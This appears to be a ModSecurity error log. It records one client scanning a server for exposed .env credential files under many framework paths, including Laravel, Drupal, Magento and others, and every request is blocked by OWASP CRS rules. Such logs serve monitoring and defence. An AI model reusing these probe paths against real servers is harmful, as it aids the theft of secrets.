[Mon May 11 18:03:15.087695 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/drupal/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwQAAAQQ"]
[Mon May 11 18:03:15.087984 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/drupal/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwQAAAQQ"]
[Mon May 11 18:03:15.088389 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9w0WKUxpmnkK7zHyhwQAAAQQ"]
[Mon May 11 18:03:15.256015 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/joomla/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwgAAAQQ"]
[Mon May 11 18:03:15.256261 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/joomla/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwgAAAQQ"]
[Mon May 11 18:03:15.256557 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9w0WKUxpmnkK7zHyhwgAAAQQ"]
[Mon May 11 18:03:15.556664 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/magento/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwwAAAQQ"]
[Mon May 11 18:03:15.556891 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/magento/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhwwAAAQQ"]
[Mon May 11 18:03:15.557174 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9w0WKUxpmnkK7zHyhwwAAAQQ"]
[Mon May 11 18:03:15.722994 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shopify/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhxAAAAQQ"]
[Mon May 11 18:03:15.723239 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shopify/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhxAAAAQQ"]
[Mon May 11 18:03:15.723527 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9w0WKUxpmnkK7zHyhxAAAAQQ"]
[Mon May 11 18:03:15.889450 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/prestashop/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhxwAAAQQ"]
[Mon May 11 18:03:15.889677 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/prestashop/.env"] [unique_id "agH9w0WKUxpmnkK7zHyhxwAAAQQ"]
[Mon May 11 18:03:15.889946 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9w0WKUxpmnkK7zHyhxwAAAQQ"]
[Mon May 11 18:03:16.152199 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/codeigniter/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhyAAAAQQ"]
[Mon May 11 18:03:16.152384 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/codeigniter/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhyAAAAQQ"]
[Mon May 11 18:03:16.152676 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhyAAAAQQ"]
[Mon May 11 18:03:16.312689 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cakephp/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhyQAAAQQ"]
[Mon May 11 18:03:16.312921 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cakephp/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhyQAAAQQ"]
[Mon May 11 18:03:16.313223 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhyQAAAQQ"]
[Mon May 11 18:03:16.477135 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/zend/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhygAAAQQ"]
[Mon May 11 18:03:16.477399 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/zend/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhygAAAQQ"]
[Mon May 11 18:03:16.477705 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhygAAAQQ"]
[Mon May 11 18:03:16.655096 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/yii/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhywAAAQQ"]
[Mon May 11 18:03:16.655334 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/yii/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhywAAAQQ"]
[Mon May 11 18:03:16.655631 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhywAAAQQ"]
[Mon May 11 18:03:16.812144 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel5/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhzAAAAQQ"]
[Mon May 11 18:03:16.812396 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel5/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhzAAAAQQ"]
[Mon May 11 18:03:16.812696 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhzAAAAQQ"]
[Mon May 11 18:03:16.996108 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v1/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhzwAAAQQ"]
[Mon May 11 18:03:16.996370 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v1/.env"] [unique_id "agH9xEWKUxpmnkK7zHyhzwAAAQQ"]
[Mon May 11 18:03:16.996699 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xEWKUxpmnkK7zHyhzwAAAQQ"]
[Mon May 11 18:03:17.160661 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v2/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0QAAAQQ"]
[Mon May 11 18:03:17.160978 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v2/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0QAAAQQ"]
[Mon May 11 18:03:17.161361 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xUWKUxpmnkK7zHyh0QAAAQQ"]
[Mon May 11 18:03:17.396899 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v3/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0gAAAQQ"]
[Mon May 11 18:03:17.397127 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v3/.env"] [unique_id "agH9xUWKUxpmnkK7zHyh0gAAAQQ"]
[Mon May 11 18:03:17.397480 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9xUWKUxpmnkK7zHyh0gAAAQQ"]
